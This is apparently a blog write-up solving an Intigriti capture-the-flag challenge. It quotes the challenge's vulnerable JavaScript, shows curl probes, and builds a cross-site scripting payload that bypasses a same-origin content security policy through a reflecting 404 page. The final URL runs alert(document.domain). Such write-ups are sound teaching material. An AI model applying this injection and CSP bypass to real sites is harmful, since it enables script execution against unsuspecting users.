Solving Intigriti Challenge using… Content Injection!

The Challenge

Understanding the JavaScript

var hash = document.location.hash.substr(1);
if(hash){
displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
if(e.target.value != "")
displayReason(e.target.value);
}
function reasonLoaded () {
var reason = document.getElementById("reason");
reason.innerHTML = unescape(this.responseText);
}
function displayReason(reason){
window.location.hash = reason;
var xhr = new XMLHttpRequest();
xhr.addEventListener("load", reasonLoaded);
xhr.open("GET",`./reasons/${reason}.txt`);
xhr.send();
}
var hash = document.location.hash.substr(1);
if(hash){
displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
if(e.target.value != "")
displayReason(e.target.value);
}
function displayReason(reason){
window.location.hash = reason;
var xhr = new XMLHttpRequest();
xhr.addEventListener("load", reasonLoaded);
xhr.open("GET",`./reasons/${reason}.txt`);
xhr.send();
}
function reasonLoaded () {
var reason = document.getElementById("reason");
reason.innerHTML = unescape(this.responseText);
}

The Chain

Phase 1: Content Injection

Anomalies

➜ curl -i https://challenge.intigriti.io/reasons/abba.txt
HTTP/2 200
x-powered-by: PHP/7.2.29
content-security-policy: default-src ‘self’
content-type: text/html; charset=UTF-8
server: Google Frontend
content-length: 53
404 — ‘File “abba.txt” was not found in this folder.’
➜ curl -i 'https://challenge.intigriti.io/reasons/<abba.txt>'
HTTP/2 200
x-powered-by: PHP/7.2.29
content-security-policy: default-src 'self'
content-type: text/html; charset=UTF-8
server: Google Frontend
content-length: 59
404 - 'File "_3Cabba.txt_3E" was not found in this folder.'
xhr.open("GET",`./reasons/${reason}.txt`);

Digging deeper

Read the source, Luke!

<p>You don't have permission to access /.htaccess% on this server.</p>

Phase 2: Bypassing the CSP

content-security-policy: default-src 'self'
<iframe srcdoc="<script src=X></script>></iframe>
404 - 'File "a" was not found in this folder.'
^-- I could control this part
404 - 'File "'-alert(document.domain)-'" was not found in this folder.'

Final Solution

<iframe/srcdoc="<script/src=/'-alert(document.domain)-'></script>">
https://challenge.intigriti.io#../.ht%253ciframe/srcdoc=<script/src=/'-alert(document.domain)-'></script></iframe>

--

--

--

Interested in technology.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

CSS Transitions with TailwindCSS and React.js on the IKEA self-help kiosks

All the fundamental you need to know in JavaScript

Most Useful JavaScript Array Functions

Make headless Chrome and Puppeteer use proxy server with authentication

Create and Organize Welcoming Screens in React Native Project

Ant Design for React

개발일지 4.

Javascript .sort() Method

Shoes sorted except for one pair that are facing the wrong direction.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Amal Murali

Amal Murali

Interested in technology.

More from Medium

CVE Program Report for Q4 Calendar Year 2021

Pwned1 — Proving Grounds Play

Cybersecurity Cockpit — A Pilot View

What Is Penetration Testing? — Informer